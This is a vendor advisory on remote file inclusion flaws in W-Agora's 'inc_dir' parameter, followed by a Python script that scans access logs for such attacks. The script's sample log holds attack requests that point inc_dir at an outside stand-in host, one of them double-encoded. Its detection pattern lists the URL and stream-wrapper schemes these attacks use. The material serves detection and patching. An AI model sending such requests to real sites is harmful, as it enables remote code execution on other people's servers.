Check Point Advisories

Update Protection against W-Agora 'inc_dir' Parameter Remote File Inclusion Vulnerabilities

Check Point Reference: CPAI-2006-131
Date Published: 13 Nov 2006
Severity: High
Last Updated: Thursday 03 May, 2007
Source: Secunia Advisory: SA20779
FrSIRT/ADV-2006-2507
Protection Provided by:
Who is Vulnerable? W-Agora version 4.2.0 and prior
Vulnerability Description: W-Agora is open source web publishing and forum software. It allows web administrators and their visitors to store and display messages and files, and to share discussions and other information on the web site. W-Agora is prone to multiple remote file inclusion vulnerabilities. An attacker can exploit these vulnerabilities to execute arbitrary PHP code on an affected system.
Update/Patch Available: Update to version 4.2.1.
http://www.w-agora.net/en/download.php
Vulnerability Details: The vulnerabilities are due to input validation errors in multiple scripts that do not validate the 'inc_dir' parameter prior to including files. A remote attacker could exploit this flaw via a specially crafted URL. By doing so, the attacker could include various vulnerable scripts and execute arbitrary commands on the vulnerable system.
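
A log-side check for the pattern described under Vulnerability Details, as an added example (not Check Point's signature and not W-Agora code): it flags requests whose 'inc_dir' query parameter decodes to a URL or PHP stream wrapper. The log lines, the script path /forum/page.php and the host names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# URL schemes and PHP stream wrappers that make include() load non-local code.
WRAPPER = re.compile(r"^\s*(https?|ftps?|php|data|expect|phar)\s*:", re.I)
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; the script path and hosts are hypothetical.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Nov/2006:10:00:01 +0000] "GET /forum/page.php?inc_dir=include HTTP/1.1" 200 5120',
    '192.0.2.44 - - [13/Nov/2006:10:00:07 +0000] "GET /forum/page.php?inc_dir=http://files.example/inc HTTP/1.1" 200 312',
    '192.0.2.44 - - [13/Nov/2006:10:00:09 +0000] "GET /forum/page.php?inc_dir=%2568ttp%253A%252F%252Ffiles.example%252Finc HTTP/1.1" 200 312',
    '192.0.2.10 - - [13/Nov/2006:10:00:12 +0000] "GET /forum/page.php?ref=http://www.example.org/&inc_dir=include HTTP/1.1" 200 5120',
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %2568 -> %68 -> h), bounded by rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_inc_dir(target):
    """Return the decoded inc_dir value if it names a URL or wrapper, else None."""
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name == "inc_dir":  # only this parameter; URLs elsewhere are ignored
            value = fully_decode(value)  # parse_qsl already decoded one layer
            if WRAPPER.match(value):
                return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if m:
            value = suspicious_inc_dir(m.group(1))
            if value is not None:
                hits.append((lineno, value))
    return hits

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: inc_dir -> {value}")
```

Access logs record only the query string, so a value sent in a POST body needs the same check at a proxy or WAF that sees the request body.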

Protection Overview
